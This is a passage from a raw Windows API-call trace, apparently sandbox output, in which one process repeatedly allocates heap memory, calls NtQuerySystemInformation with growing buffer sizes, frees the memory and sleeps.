dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.143] Sleep (dwMilliseconds=0x110) [0206.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.161] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.162] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.162] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.163] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.163] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.164] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.164] Sleep (dwMilliseconds=0x110) [0206.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.175] Sleep (dwMilliseconds=0x110) [0206.185] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.186] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.186] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.187] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.187] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.187] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.191] Sleep (dwMilliseconds=0x110) [0206.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.207] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.207] Sleep (dwMilliseconds=0x110) [0206.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.216] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.216] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.216] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.219] Sleep (dwMilliseconds=0x110) [0206.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.235] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.236] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.236] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.236] Sleep (dwMilliseconds=0x110) [0206.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.247] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.252] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.253] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.254] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.254] Sleep (dwMilliseconds=0x110) [0206.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.267] Sleep (dwMilliseconds=0x110) [0206.278] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.278] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.279] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.279] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.279] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.280] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.285] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.286] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.286] Sleep (dwMilliseconds=0x110) [0206.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.300] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.301] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.301] Sleep (dwMilliseconds=0x110) [0206.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.318] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.318] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.318] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.322] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.323] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.324] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.324] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.324] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.324] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.325] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.326] Sleep (dwMilliseconds=0x110) [0206.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.350] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.350] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.351] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.351] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.351] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.352] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.352] Sleep (dwMilliseconds=0x110) [0206.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0206.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0206.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0206.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0206.367] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.367] Sleep (dwMilliseconds=0x110) [0206.417] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0206.417] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.418] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0206.437] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0206.438] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0206.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 